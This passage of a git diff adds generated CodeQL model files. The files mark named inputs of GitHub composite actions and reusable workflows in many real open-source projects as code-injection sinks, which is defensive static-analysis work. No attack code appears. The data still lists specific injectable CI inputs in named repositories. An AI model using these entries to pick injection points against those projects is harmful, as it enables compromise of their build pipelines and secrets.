b/actions/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml new file mode 100644 index 000000000000..f1689c520290 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/actions/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml new file mode 100644 index 000000000000..00ae4bfb9b85 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] + - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/actions/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml new file mode 100644 index 000000000000..1bd2cf924182 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.base", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/actions/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml new file mode 100644 index 000000000000..2dc89f564f5d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/actions/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml new file mode 100644 index 000000000000..9dbd2fce9892 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.artifact", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.major_version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.branch", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.framework", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/actions/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml new file mode 100644 index 000000000000..7722a6353072 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/actions/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml new file mode 100644 index 000000000000..4fc41527037c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/actions/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml new file mode 100644 index 000000000000..729aa139693e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml new file mode 100644 index 000000000000..e08457ef5ea7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml new file mode 100644 index 000000000000..c19a1fc3eef1 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml new file mode 100644 index 000000000000..a719b0dc87e7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml new file mode 100644 index 000000000000..9a9b3a5d3df8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml new file mode 100644 index 000000000000..3f9b4ea61cc5 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/actions/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml new file mode 100644 index 000000000000..6e36f5dea2be --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.personal-access-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/actions/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml new file mode 100644 index 000000000000..f1b143d7c44f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] + - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/actions/ql/lib/ext/generated/composite-actions/stellar_go.model.yml new file mode 100644 index 000000000000..42d9df16b35d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/actions/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml new file mode 100644 index 000000000000..386b0aa6ea94 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/actions/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml new file mode 100644 index 000000000000..54bf59f06470 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml new file mode 100644 index 000000000000..2a2a8fcc2063 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.language", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.job-name", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.build-commands", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml new file mode 100644 index 000000000000..05dbdf6bf45b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.serializationType", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.inputSpec", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/actions/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml new file mode 100644 index 000000000000..4276ce4b98dd --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.revision", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.submodule", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/actions/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml new file mode 100644 index 000000000000..ac210c93a1ec --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/actions/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml new file mode 100644 index 000000000000..501d4a8a45f5 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] + - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/actions/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml new file mode 100644 index 000000000000..b582844dc7c8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/actions/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml new file mode 100644 index 000000000000..9de223281878 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.path", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.cluster-location", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.cluster-name", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.gcp-project-id", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.package", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/actions/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml new file mode 100644 index 000000000000..7234c3cbd5f4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "input.compose-file", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/actions/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml new file mode 100644 index 000000000000..27ee66eae484 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.status", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.full-deps", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/actions/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml new file mode 100644 index 000000000000..96586d295343 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.duration", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.requirements", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml new file mode 100644 index 000000000000..5e7e997272d3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.setup-deps", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.label", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.debug", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.check-run-id", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.check-all-mode", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.cache-key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/actions/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml new file mode 100644 index 000000000000..8a9326121006 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/actions/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml new file mode 100644 index 000000000000..494e71db707b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/actions/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml new file mode 100644 index 000000000000..200f6bbfc437 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/actions/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml new file mode 100644 index 000000000000..a542370c7de2 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.key-secret", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.key-id", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.endpoint", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.asset-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/actions/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml new file mode 100644 index 000000000000..8b529012be2b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.npm_tag", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.prev_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.new_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.pre_id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/actions/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml new file mode 100644 index 000000000000..defeb5f7974f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.npm-tag", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.release-id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/actions/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml new file mode 100644 index 000000000000..7eba6fb3b004 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/actions/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml new file mode 100644 index 000000000000..fc8085843ddc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.relay-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-secret", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.explorer-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.notify-endpoint", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/actions/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml new file mode 100644 index 000000000000..2d831ccbcedf --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/actions/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml new file mode 100644 index 000000000000..b8892f32d7fe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/actions/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml new file mode 100644 index 000000000000..3809c827dda9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/actions/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml new file mode 100644 index 000000000000..88f4246b1623 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/actions/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml new file mode 100644 index 000000000000..35d394a116fc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] + - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] + - ["xrplf/rippled", "*", "input.cmake-args", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/actions/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml new file mode 100644 index 000000000000..234ed7fef076 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] + - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/actions/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml new file mode 100644 index 000000000000..e9ad23c8331e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/actions/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml new file mode 100644 index 000000000000..49ac7d2bf717 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] + - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml new file mode 100644 index 000000000000..99041db6e26d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml new file mode 100644 index 000000000000..dd132b20a05b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -0,0 +1,9 @@ +extensions: + - 